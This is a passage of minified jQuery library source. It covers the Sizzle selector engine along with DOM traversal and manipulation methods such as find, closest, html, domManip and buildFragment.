i,s=e([],n.length,t),o=s.length;while(o--)n[i=s[o]]&&(n[i]=!(r[i]=n[i]))})})}function ht(e,t){var n,r,s,o,u,a,f,l=C[e+" "];if(l)return t?0:l.slice(0);u=e,a=[],f=i.preFilter;while(u){if(!n||(r=U.exec(u)))r&&(u=u.slice(r[0].length)||u),a.push(s=[]);n=!1;if(r=z.exec(u))n=r.shift(),s.push({value:n,type:r[0].replace(R," ")}),u=u.slice(n.length);for(o in i.filter)(r=V[o].exec(u))&&(!f[o]||(r=f[o](r)))&&(n=r.shift(),s.push({value:n,type:o,matches:r}),u=u.slice(n.length));if(!n)break}return t?u.length:u?ut.error(e):C(e,a).slice(0)}function pt(e){var t=0,n=e.length,r="";for(;t<n;t++)r+=e[t].value;return r}function dt(e,t,n){var i=t.dir,s=n&&t.dir==="parentNode",o=T++;return t.first?function(t,n,r){while(t=t[i])if(t.nodeType===1||s)return e(t,n,r)}:function(t,n,u){var a,f,l,c=x+" "+o;if(u){while(t=t[i])if(t.nodeType===1||s)if(e(t,n,u))return!0}else while(t=t[i])if(t.nodeType===1||s){l=t[w]||(t[w]={});if((f=l[i])&&f[0]===c){if((a=f[1])===!0||a===r)return a===!0}else{f=l[i]=[c],f[1]=e(t,n,u)||r;if(f[1]===!0)return!0}}}}function vt(e){return e.length>1?function(t,n,r){var i=e.length;while(i--)if(!e[i](t,n,r))return!1;return!0}:e[0]}function mt(e,t,n,r,i){var s,o=[],u=0,a=e.length,f=t!=null;for(;u<a;u++)if(s=e[u])if(!n||n(s,r,i))o.push(s),f&&t.push(u);return o}function gt(e,t,n,r,i,s){return r&&!r[w]&&(r=gt(r)),i&&!i[w]&&(i=gt(i,s)),st(function(s,o,u,a){var f,l,c,h=[],p=[],d=o.length,v=s||wt(t||"*",u.nodeType?[u]:u,[]),m=e&&(s||!t)?mt(v,h,e,u,a):v,g=n?i||(s?e:d||r)?[]:o:m;n&&n(m,g,u,a);if(r){f=mt(g,p),r(f,[],u,a),l=f.length;while(l--)if(c=f[l])g[p[l]]=!(m[p[l]]=c)}if(s){if(i||e){if(i){f=[],l=g.length;while(l--)(c=g[l])&&f.push(m[l]=c);i(null,g=[],f,a)}l=g.length;while(l--)(c=g[l])&&(f=i?P.call(s,c):h[l])>-1&&(s[f]=!(o[f]=c))}}else g=mt(g===o?g.splice(d,g.length):g),i?i(null,o,g,a):_.apply(o,g)})}function yt(e){var t,n,r,s=e.length,o=i.relative[e[0].type],u=o||i.relative[" "],a=o?1:0,l=dt(function(e){return e===t},u,!0),c=dt(function(e){return P.call(t,e)>-1},u,!0),h=[function(e,n,r){return!o&&(r||n!==f)||((t=n).nodeType?l(e,n,r):c(e,n,r))}];for(;a<s;a++)if(n=i.relative[e[a].type])h=[dt(vt(h),n)];else{n=i.filter[e[a].type].apply(null,e[a].matches);if(n[w]){r=++a;for(;r<s;r++)if(i.relative[e[r].type])break;return gt(a>1&&vt(h),a>1&&pt(e.slice(0,a-1)).replace(R,"$1"),n,a<r&&yt(e.slice(a,r)),r<s&&yt(e=e.slice(r)),r<s&&pt(e))}h.push(n)}return vt(h)}function bt(e,t){var n=0,s=t.length>0,o=e.length>0,u=function(u,a,l,h,p){var d,v,m,g=[],y=0,b="0",w=u&&[],E=p!=null,S=f,T=u||o&&i.find.TAG("*",p&&a.parentNode||a),N=x+=S==null?1:Math.E;E&&(f=a!==c&&a,r=n);for(;(d=T[b])!=null;b++){if(o&&d){for(v=0;m=e[v];v++)if(m(d,a,l)){h.push(d);break}E&&(x=N,r=++n)}s&&((d=!m&&d)&&y--,u&&w.push(d))}y+=b;if(s&&b!==y){for(v=0;m=t[v];v++)m(w,g,a,l);if(u){if(y>0)while(b--)!w[b]&&!g[b]&&(g[b]=M.call(h));g=mt(g)}_.apply(h,g),E&&!u&&g.length>0&&y+t.length>1&&ut.uniqueSort(h)}return E&&(x=N,f=S),w};return s?st(u):u}function wt(e,t,n){var r=0,i=t.length;for(;r<i;r++)ut(e,t[r],n);return n}function Et(e,t,n,r){var s,o,a,f,l,c=ht(e);if(!r&&c.length===1){o=c[0]=c[0].slice(0);if(o.length>2&&(a=o[0]).type==="ID"&&t.nodeType===9&&!p&&i.relative[o[1].type]){t=i.find.ID(a.matches[0].replace(et,tt),t)[0];if(!t)return n;e=e.slice(o.shift().value.length)}for(s=V.needsContext.test(e)?-1:o.length-1;s>=0;s--){a=o[s];if(i.relative[f=a.type])break;if(l=i.find[f])if(r=l(a.matches[0].replace(et,tt),$.test(o[0].type)&&t.parentNode||t)){o.splice(s,1),e=r.length&&pt(o);if(!e)return _.apply(n,D.call(r,0)),n;break}}}return u(e,c)(r,t,p,n,$.test(e)),n}function St(){}var n,r,i,s,o,u,a,f,l,c,h,p,d,v,m,g,b,w="sizzle"+ -(new Date),E=e.document,S={},x=0,T=0,N=it(),C=it(),k=it(),L=typeof t,A=1<<31,O=[],M=O.pop,_=O.push,D=O.slice,P=O.indexOf||function(e){var t=0,n=this.length;for(;t<n;t++)if(this[t]===e)return t;return-1},H="[\\x20\\t\\r\\n\\f]",B="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",j=B.replace("w","w#"),F="([*^$|!~]?=)",I="\\["+H+"*("+B+")"+H+"*(?:"+F+H+"*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|("+j+")|)|)"+H+"*\\]",q=":("+B+")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|"+I.replace(3,8)+")*)|.*)\\)|)",R=new RegExp("^"+H+"+|((?:^|[^\\\\])(?:\\\\.)*)"+H+"+$","g"),U=new RegExp("^"+H+"*,"+H+"*"),z=new RegExp("^"+H+"*([\\x20\\t\\r\\n\\f>+~])"+H+"*"),W=new RegExp(q),X=new RegExp("^"+j+"$"),V={ID:new RegExp("^#("+B+")"),CLASS:new RegExp("^\\.("+B+")"),NAME:new RegExp("^\\[name=['\"]?("+B+")['\"]?\\]"),TAG:new RegExp("^("+B.replace("w","w*")+")"),ATTR:new RegExp("^"+I),PSEUDO:new RegExp("^"+q),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+H+"*(even|odd|(([+-]|)(\\d*)n|)"+H+"*(?:([+-]|)"+H+"*(\\d+)|))"+H+"*\\)|)","i"),needsContext:new RegExp("^"+H+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+H+"*((?:-\\d)?\\d*)"+H+"*\\)|)(?=[^-]|$)","i")},$=/[\x20\t\r\n\f]*[+~]/,J=/\{\s*\[native code\]\s*\}/,K=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,Q=/^(?:input|select|textarea|button)$/i,G=/^h\d$/i,Y=/'|\\/g,Z=/\=[\x20\t\r\n\f]*([^'"\]]*)[\x20\t\r\n\f]*\]/g,et=/\\([\da-fA-F]{1,6}[\x20\t\r\n\f]?|.)/g,tt=function(e,t){var n="0x"+t-65536;return n!==n?t:n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,n&1023|56320)};try{D.call(h.childNodes,0)[0].nodeType}catch(nt){D=function(e){var t,n=[];for(;t=this[e];e++)n.push(t);return n}}o=ut.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?t.nodeName!=="HTML":!1},l=ut.setDocument=function(e){var n=e?e.ownerDocument||e:E;if(n===c||n.nodeType!==9||!n.documentElement)return c;c=n,h=n.documentElement,p=o(n),S.tagNameNoComments=ot(function(e){return e.appendChild(n.createComment("")),!e.getElementsByTagName("*").length}),S.attributes=ot(function(e){e.innerHTML="<select></select>";var t=typeof e.lastChild.getAttribute("multiple");return t!=="boolean"&&t!=="string"}),S.getByClassName=ot(function(e){return e.innerHTML="<div class='hidden e'></div><div class='hidden'></div>",!e.getElementsByClassName||!e.getElementsByClassName("e").length?!1:(e.lastChild.className="e",e.getElementsByClassName("e").length===2)}),S.getByName=ot(function(e){e.id=w+0,e.innerHTML="<a name='"+w+"'></a><div name='"+w+"'></div>",h.insertBefore(e,h.firstChild);var t=n.getElementsByName&&n.getElementsByName(w).length===2+n.getElementsByName(w+0).length;return S.getIdNotName=!n.getElementById(w),h.removeChild(e),t}),i.attrHandle=ot(function(e){return e.innerHTML="<a href='#'></a>",e.firstChild&&typeof e.firstChild.getAttribute!==L&&e.firstChild.getAttribute("href")==="#"})?{}:{href:function(e){return e.getAttribute("href",2)},type:function(e){return e.getAttribute("type")}},S.getIdNotName?(i.find.ID=function(e,t){if(typeof t.getElementById!==L&&!p){var n=t.getElementById(e);return n&&n.parentNode?[n]:[]}},i.filter.ID=function(e){var t=e.replace(et,tt);return function(e){return e.getAttribute("id")===t}}):(i.find.ID=function(e,n){if(typeof n.getElementById!==L&&!p){var r=n.getElementById(e);return r?r.id===e||typeof r.getAttributeNode!==L&&r.getAttributeNode("id").value===e?[r]:t:[]}},i.filter.ID=function(e){var t=e.replace(et,tt);return function(e){var n=typeof e.getAttributeNode!==L&&e.getAttributeNode("id");return n&&n.value===t}}),i.find.TAG=S.tagNameNoComments?function(e,t){if(typeof t.getElementsByTagName!==L)return t.getElementsByTagName(e)}:function(e,t){var n,r=[],i=0,s=t.getElementsByTagName(e);if(e==="*"){for(;n=s[i];i++)n.nodeType===1&&r.push(n);return r}return s},i.find.NAME=S.getByName&&function(e,t){if(typeof t.getElementsByName!==L)return t.getElementsByName(name)},i.find.CLASS=S.getByClassName&&function(e,t){if(typeof t.getElementsByClassName!==L&&!p)return t.getElementsByClassName(e)},v=[],d=[":focus"];if(S.qsa=rt(n.querySelectorAll))ot(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||d.push("\\["+H+"*(?:checked|disabled|ismap|multiple|readonly|selected|value)"),e.querySelectorAll(":checked").length||d.push(":checked")}),ot(function(e){e.innerHTML="<input type='hidden' i=''/>",e.querySelectorAll("[i^='']").length&&d.push("[*^$]="+H+"*(?:\"\"|'')"),e.querySelectorAll(":enabled").length||d.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),d.push(",.*:")});return(S.matchesSelector=rt(m=h.matchesSelector||h.mozMatchesSelector||h.webkitMatchesSelector||h.oMatchesSelector||h.msMatchesSelector))&&ot(function(e){S.disconnectedMatch=m.call(e,"div"),m.call(e,"[s!='']:x"),v.push("!=",q)}),d=new RegExp(d.join("|")),v=new RegExp(v.join("|")),g=rt(h.contains)||h.compareDocumentPosition?function(e,t){var n=e.nodeType===9?e.documentElement:e,r=t&&t.parentNode;return e===r||!!r&&r.nodeType===1&&!!(n.contains?n.contains(r):e.compareDocumentPosition&&e.compareDocumentPosition(r)&16)}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},b=h.compareDocumentPosition?function(e,t){var r;if(e===t)return a=!0,0;if(r=t.compareDocumentPosition&&e.compareDocumentPosition&&e.compareDocumentPosition(t))return r&1||e.parentNode&&e.parentNode.nodeType===11?e===n||g(E,e)?-1:t===n||g(E,t)?1:0:r&4?-1:1;return e.compareDocumentPosition?-1:1}:function(e,t){var r,i=0,s=e.parentNode,o=t.parentNode,u=[e],f=[t];if(e===t)return a=!0,0;if(e.sourceIndex&&t.sourceIndex)return(~t.sourceIndex||A)-(g(E,e)&&~e.sourceIndex||A);if(!s||!o)return e===n?-1:t===n?1:s?-1:o?1:0;if(s===o)return at(e,t);r=e;while(r=r.parentNode)u.unshift(r);r=t;while(r=r.parentNode)f.unshift(r);while(u[i]===f[i])i++;return i?at(u[i],f[i]):u[i]===E?-1:f[i]===E?1:0},a=!1,[0,0].sort(b),S.detectDuplicates=a,c},ut.matches=function(e,t){return ut(e,null,null,t)},ut.matchesSelector=function(e,t){(e.ownerDocument||e)!==c&&l(e),t=t.replace(Z,"='$1']");if(S.matchesSelector&&!p&&(!v||!v.test(t))&&!d.test(t))try{var n=m.call(e,t);if(n||S.disconnectedMatch||e.document&&e.document.nodeType!==11)return n}catch(r){}return ut(t,c,null,[e]).length>0},ut.contains=function(e,t){return(e.ownerDocument||e)!==c&&l(e),g(e,t)},ut.attr=function(e,t){var n;return(e.ownerDocument||e)!==c&&l(e),p||(t=t.toLowerCase()),(n=i.attrHandle[t])?n(e):p||S.attributes?e.getAttribute(t):((n=e.getAttributeNode(t))||e.getAttribute(t))&&e[t]===!0?t:n&&n.specified?n.value:null},ut.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},ut.uniqueSort=function(e){var t,n=[],r=1,i=0;a=!S.detectDuplicates,e.sort(b);if(a){for(;t=e[r];r++)t===e[r-1]&&(i=n.push(r));while(i--)e.splice(n[i],1)}return e},s=ut.getText=function(e){var t,n="",r=0,i=e.nodeType;if(!i)for(;t=e[r];r++)n+=s(t);else if(i===1||i===9||i===11){if(typeof e.textContent=="string")return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=s(e)}else if(i===3||i===4)return e.nodeValue;return n},i=ut.selectors={cacheLength:50,createPseudo:st,match:V,find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace(et,tt),e[3]=(e[4]||e[5]||"").replace(et,tt),e[2]==="~="&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),e[1].slice(0,3)==="nth"?(e[3]||ut.error(e[0]),e[4]=+(e[4]?e[5]+(e[6]||1):2*(e[3]==="even"||e[3]==="odd")),e[5]=+(e[7]+e[8]||e[3]==="odd")):e[3]&&ut.error(e[0]),e},PSEUDO:function(e){var t,n=!e[5]&&e[2];return V.CHILD.test(e[0])?null:(e[4]?e[2]=e[4]:n&&W.test(n)&&(t=ht(n,!0))&&(t=n.indexOf(")",n.length-t)-n.length)&&(e[0]=e[0].slice(0,t),e[2]=n.slice(0,t)),e.slice(0,3))}},filter:{TAG:function(e){return e==="*"?function(){return!0}:(e=e.replace(et,tt).toLowerCase(),function(t){return t.nodeName&&t.nodeName.toLowerCase()===e})},CLASS:function(e){var t=N[e+" "];return t||(t=new RegExp("(^|"+H+")"+e+"("+H+"|$)"))&&N(e,function(e){return t.test(e.className||typeof e.getAttribute!==L&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r){var i=ut.attr(r,e);return i==null?t==="!=":t?(i+="",t==="="?i===n:t==="!="?i!==n:t==="^="?n&&i.indexOf(n)===0:t==="*="?n&&i.indexOf(n)>-1:t==="$="?n&&i.substr(i.length-n.length)===n:t==="~="?(" "+i+" ").indexOf(n)>-1:t==="|="?i===n||i.substr(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r,i){var s=e.slice(0,3)!=="nth",o=e.slice(-4)!=="last",u=t==="of-type";return r===1&&i===0?function(e){return!!e.parentNode}:function(t,n,a){var f,l,c,h,p,d,v=s!==o?"nextSibling":"previousSibling",m=t.parentNode,g=u&&t.nodeName.toLowerCase(),y=!a&&!u;if(m){if(s){while(v){c=t;while(c=c[v])if(u?c.nodeName.toLowerCase()===g:c.nodeType===1)return!1;d=v=e==="only"&&!d&&"nextSibling"}return!0}d=[o?m.firstChild:m.lastChild];if(o&&y){l=m[w]||(m[w]={}),f=l[e]||[],p=f[0]===x&&f[1],h=f[0]===x&&f[2],c=p&&m.childNodes[p];while(c=++p&&c&&c[v]||(h=p=0)||d.pop())if(c.nodeType===1&&++h&&c===t){l[e]=[x,p,h];break}}else if(y&&(f=(t[w]||(t[w]={}))[e])&&f[0]===x)h=f[1];else while(c=++p&&c&&c[v]||(h=p=0)||d.pop())if((u?c.nodeName.toLowerCase()===g:c.nodeType===1)&&++h){y&&((c[w]||(c[w]={}))[e]=[x,h]);if(c===t)break}return h-=i,h===r||h%r===0&&h/r>=0}}},PSEUDO:function(e,t){var n,r=i.pseudos[e]||i.setFilters[e.toLowerCase()]||ut.error("unsupported pseudo: "+e);return r[w]?r(t):r.length>1?(n=[e,e,"",t],i.setFilters.hasOwnProperty(e.toLowerCase())?st(function(e,n){var i,s=r(e,t),o=s.length;while(o--)i=P.call(e,s[o]),e[i]=!(n[i]=s[o])}):function(e){return r(e,0,n)}):r}},pseudos:{not:st(function(e){var t=[],n=[],r=u(e.replace(R,"$1"));return r[w]?st(function(e,t,n,i){var s,o=r(e,null,i,[]),u=e.length;while(u--)if(s=o[u])e[u]=!(t[u]=s)}):function(e,i,s){return t[0]=e,r(t,null,s,n),!n.pop()}}),has:st(function(e){return function(t){return ut(e,t).length>0}}),contains:st(function(e){return function(t){return(t.textContent||t.innerText||s(t)).indexOf(e)>-1}}),lang:st(function(e){return X.test(e||"")||ut.error("unsupported lang: "+e),e=e.replace(et,tt).toLowerCase(),function(t){var n;do if(n=p?t.getAttribute("xml:lang")||t.getAttribute("lang"):t.lang)return n=n.toLowerCase(),n===e||n.indexOf(e+"-")===0;while((t=t.parentNode)&&t.nodeType===1);return!1}}),target:function(t){var n=e.location&&e.location.hash;return n&&n.slice(1)===t.id},root:function(e){return e===h},focus:function(e){return e===c.activeElement&&(!c.hasFocus||c.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return t==="input"&&!!e.checked||t==="option"&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeName>"@"||e.nodeType===3||e.nodeType===4)return!1;return!0},parent:function(e){return!i.pseudos.empty(e)},header:function(e){return G.test(e.nodeName)},input:function(e){return Q.test(e.nodeName)},button:function(e){var t=e.nodeName.toLowerCase();return t==="input"&&e.type==="button"||t==="button"},text:function(e){var t;return e.nodeName.toLowerCase()==="input"&&e.type==="text"&&((t=e.getAttribute("type"))==null||t.toLowerCase()===e.type)},first:ct(function(){return[0]}),last:ct(function(e,t){return[t-1]}),eq:ct(function(e,t,n){return[n<0?n+t:n]}),even:ct(function(e,t){var n=0;for(;n<t;n+=2)e.push(n);return e}),odd:ct(function(e,t){var n=1;for(;n<t;n+=2)e.push(n);return e}),lt:ct(function(e,t,n){var r=n<0?n+t:n;for(;--r>=0;)e.push(r);return e}),gt:ct(function(e,t,n){var r=n<0?n+t:n;for(;++r<t;)e.push(r);return e})}};for(n in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})i.pseudos[n]=ft(n);for(n in{submit:!0,reset:!0})i.pseudos[n]=lt(n);u=ut.compile=function(e,t){var n,r=[],i=[],s=k[e+" "];if(!s){t||(t=ht(e)),n=t.length;while(n--)s=yt(t[n]),s[w]?r.push(s):i.push(s);s=k(e,bt(i,r))}return s},i.pseudos.nth=i.pseudos.eq,i.filters=St.prototype=i.pseudos,i.setFilters=new St,l(),ut.attr=y.attr,y.find=ut,y.expr=ut.selectors,y.expr[":"]=y.expr.pseudos,y.unique=ut.uniqueSort,y.text=ut.getText,y.isXMLDoc=ut.isXML,y.contains=ut.contains}(e);var it=/Until$/,st=/^(?:parents|prev(?:Until|All))/,ot=/^.[^:#\[\.,]*$/,ut=y.expr.match.needsContext,at={children:!0,contents:!0,next:!0,prev:!0};y.fn.extend({find:function(e){var t,n,r;if(typeof e!="string")return r=this,this.pushStack(y(e).filter(function(){for(t=0;t<r.length;t++)if(y.contains(r[t],this))return!0}));n=[];for(t=0;t<this.length;t++)y.find(e,this[t],n);return n=this.pushStack(y.unique(n)),n.selector=(this.selector?this.selector+" ":"")+e,n},has:function(e){var t,n=y(e,this),r=n.length;return this.filter(function(){for(t=0;t<r;t++)if(y.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(lt(this,e,!1))},filter:function(e){return this.pushStack(lt(this,e,!0))},is:function(e){return!!e&&(typeof e=="string"?ut.test(e)?y(e,this.context).index(this[0])>=0:y.filter(e,this).length>0:this.filter(e).length>0)},closest:function(e,t){var n,r=0,i=this.length,s=[],o=ut.test(e)||typeof e!="string"?y(e,t||this.context):0;for(;r<i;r++){n=this[r];while(n&&n.ownerDocument&&n!==t&&n.nodeType!==11){if(o?o.index(n)>-1:y.find.matchesSelector(n,e)){s.push(n);break}n=n.parentNode}}return this.pushStack(s.length>1?y.unique(s):s)},index:function(e){return e?typeof e=="string"?y.inArray(this[0],y(e)):y.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(e,t){var n=typeof e=="string"?y(e,t):y.makeArray(e&&e.nodeType?[e]:e),r=y.merge(this.get(),n);return this.pushStack(y.unique(r))},addBack:function(e){return this.add(e==null?this.prevObject:this.prevObject.filter(e))}}),y.fn.andSelf=y.fn.addBack,y.each({parent:function(e){var t=e.parentNode;return t&&t.nodeType!==11?t:null},parents:function(e){return y.dir(e,"parentNode")},parentsUntil:function(e,t,n){return y.dir(e,"parentNode",n)},next:function(e){return ft(e,"nextSibling")},prev:function(e){return ft(e,"previousSibling")},nextAll:function(e){return y.dir(e,"nextSibling")},prevAll:function(e){return y.dir(e,"previousSibling")},nextUntil:function(e,t,n){return y.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return y.dir(e,"previousSibling",n)},siblings:function(e){return y.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return y.sibling(e.firstChild)},contents:function(e){return y.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:y.merge([],e.childNodes)}},function(e,t){y.fn[e]=function(n,r){var i=y.map(this,t,n);return it.test(e)||(r=n),r&&typeof r=="string"&&(i=y.filter(r,i)),i=this.length>1&&!at[e]?y.unique(i):i,this.length>1&&st.test(e)&&(i=i.reverse()),this.pushStack(i)}}),y.extend({filter:function(e,t,n){return n&&(e=":not("+e+")"),t.length===1?y.find.matchesSelector(t[0],e)?[t[0]]:[]:y.find.matches(e,t)},dir:function(e,n,r){var i=[],s=e[n];while(s&&s.nodeType!==9&&(r===t||s.nodeType!==1||!y(s).is(r)))s.nodeType===1&& i.push(s),s=s[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)e.nodeType===1&&e!==t&&n.push(e);return n}});var ht="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",pt=/ jQuery\d+="(?:null|\d+)"/g,dt=new RegExp("<(?:"+ht+")[\\s/>]","i"),vt=/^\s+/,mt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,gt=/<([\w:]+)/,yt=/<tbody/i,bt=/<|&#?\w+;/,wt=/<(?:script|style|link)/i,Et=/^(?:checkbox|radio)$/i,St=/checked\s*(?:[^=]|=\s*.checked.)/i,xt=/^$|\/(?:java|ecma)script/i,Tt=/^true\/(.*)/,Nt=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,Ct={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:y.support.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},kt=ct(i),Lt=kt.appendChild(i.createElement("div"));Ct.optgroup=Ct.option,Ct.tbody=Ct.tfoot=Ct.colgroup=Ct.caption=Ct.thead,Ct.th=Ct.td,y.fn.extend({text:function(e){return y.access(this,function(e){return e===t?y.text(this):this.empty().append((this[0]&&this[0].ownerDocument||i).createTextNode(e))},null,e,arguments.length)},wrapAll:function(e){if(y.isFunction(e))return this.each(function(t){y(this).wrapAll(e.call(this,t))});if(this[0]){var t=y(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&e.firstChild.nodeType===1)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return y.isFunction(e)?this.each(function(t){y(this).wrapInner(e.call(this,t))}):this.each(function(){var t=y(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=y.isFunction(e);return this.each(function(n){y(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){y.nodeName(this,"body")||y(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(e){(this.nodeType===1||this.nodeType===11||this.nodeType===9)&&this.appendChild(e)})},prepend:function(){return this.domManip(arguments,!0,function(e){(this.nodeType===1||this.nodeType===11||this.nodeType===9)&&this.insertBefore(e,this.firstChild)})},before:function(){return this.domManip(arguments,!1,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return this.domManip(arguments,!1,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){var n,r=0;for(;(n=this[r])!=null;r++)if(!e||y.filter(e,[n]).length>0)!t&&n.nodeType===1&&y.cleanData(Ht(n)),n.parentNode&&(t&&y.contains(n.ownerDocument,n)&&_t(Ht(n,"script")),n.parentNode.removeChild(n));return this},empty:function(){var e,t=0;for(;(e=this[t])!=null;t++){e.nodeType===1&&y.cleanData(Ht(e,!1));while(e.firstChild)e.removeChild(e.firstChild);e.options&&y.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=e==null?!1:e,t=t==null?e:t,this.map(function(){return y.clone(this,e,t)})},html:function(e){return y.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return n.nodeType===1?n.innerHTML.replace(pt,""):t;if(typeof e=="string"&&!wt.test(e)&&(y.support.htmlSerialize||!dt.test(e))&&(y.support.leadingWhitespace||!vt.test(e))&&!Ct[(gt.exec(e)||["",""])[1].toLowerCase()]){e=e.replace(mt,"<$1></$2>");try{for(;r<i;r++)n=this[r]||{},n.nodeType===1&&(y.cleanData(Ht(n,!1)),n.innerHTML=e);n=0}catch(s){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(e){var t=y.isFunction(e);return!t&&typeof e!="string"&&(e=y(e).not(this).detach()),this.domManip([e],!0,function(e){var t=this.nextSibling,n=this.parentNode;if(n&&this.nodeType===1||this.nodeType===11)y(this).remove(),t?t.parentNode.insertBefore(e,t):n.appendChild(e)})},detach:function(e){return this.remove(e,!0)},domManip:function(e,n,r){e=c.apply([],e);var i,s,o,u,a,f,l=0,h=this.length,p=this,d=h-1,v=e[0],m=y.isFunction(v);if(m||!(h<=1||typeof v!="string"||y.support.checkClone||!St.test(v)))return this.each(function(i){var s=p.eq(i);m&&(e[0]=v.call(this,i,n?s.html():t)),s.domManip(e,n,r)});if(h){i=y.buildFragment(e,this[0].ownerDocument,!1,this),s=i.firstChild,i.childNodes.length===1&&(i=s);if(s){n=n&&y.nodeName(s,"tr"),o=y.map(Ht(i,"script"),Ot),u=o.length;for(;l<h;l++)a=i,l!==d&&(a=y.clone(a,!0,!0),u&&y.merge(o,Ht(a,"script"))),r.call(n&&y.nodeName(this[l],"table")?At(this[l],"tbody"):this[l],a,l);if(u){f=o[o.length-1].ownerDocument,y.map(o,Mt);for(l=0;l<u;l++)a=o[l],xt.test(a.type||"")&&!y._data(a,"globalEval")&&y.contains(f,a)&&(a.src?y.ajax({url:a.src,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0}):y.globalEval((a.text||a.textContent||a.innerHTML||"").replace(Nt,"")))}i=s=null}}return this}}),y.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){y.fn[e]=function(e){var n,r=0,i=[],s=y(e),o=s.length-1;for(;r<=o;r++)n=r===o?this:this.clone(!0),y(s[r])[t](n),h.apply(i,n.get());return this.pushStack(i)}}),y.extend({clone:function(e,t,n){var r,i,s,o,u,a=y.contains(e.ownerDocument,e);y.support.html5Clone||y.isXMLDoc(e)||!dt.test("<"+e.nodeName+">")?u=e.cloneNode(!0):(Lt.innerHTML=e.outerHTML,Lt.removeChild(u=Lt.firstChild));if((!y.support.noCloneEvent||!y.support.noCloneChecked)&&(e.nodeType===1||e.nodeType===11)&&!y.isXMLDoc(e)){r=Ht(u),i=Ht(e);for(o=0;(s=i[o])!=null;++o)r[o]&&Pt(s,r[o])}if(t)if(n){i=i||Ht(e),r=r||Ht(u);for(o=0;(s=i[o])!=null;o++)Dt(s,r[o])}else Dt(e,u);return r=Ht(u,"script"),r.length>0&&_t(r,!a&&Ht(e,"script")),r=i=s=null,u},buildFragment:function(e,t,n,r){var i,s,o,u,a,f,l,c=e.length,h=ct(t),p=[],d=0;for(;d<c;d++){s=e[d];if(s||s===0)if(y.type(s)==="object")y.merge(p,s.nodeType?[s]:s);else if(!bt.test(s))p.push(t.createTextNode(s));else{u=u||h.appendChild(t.createElement("div")),o=(gt.exec(s)||["",""])[1].toLowerCase(),a=Ct[o]||Ct._default,u.innerHTML=a[1]+s.replace(mt,"<$1></$2>")+a[2],l=a[0];while(l--)u=u.lastChild;!y.support.leadingWhitespace&&vt.test(s)&&p.push(t.createTextNode(vt.exec(s)[0]));if(!y.support.tbody){s=o==="table"&&!yt.test(s)?u.firstChild:a[1]==="<table>"&&!yt.test(s)?u:0,l=s&&s.childNodes.length;while(l--)y.nodeName(f=s.childNodes[l],"tbody")&&!f.childNodes.length&&s.removeChild(f)}y.merge(p,u.childNodes),u.textContent="";while(u.firstChild)u.removeChild(u.firstChild);u=h.lastChild}}u&&h.removeChild(u),y.support.appendChecked||y.grep(Ht(p,"input"),Bt),d=0;while(s=p[d++]){if(r&&y.inArray(s,r)!==-1)continue;i=y.contains(s.ownerDocument,s),u=Ht(h.appendChild(s),"script"),i&&_t(u);if(n){l=0;while(s=u[l++])xt.test(s.type||"")&&n.push(s)}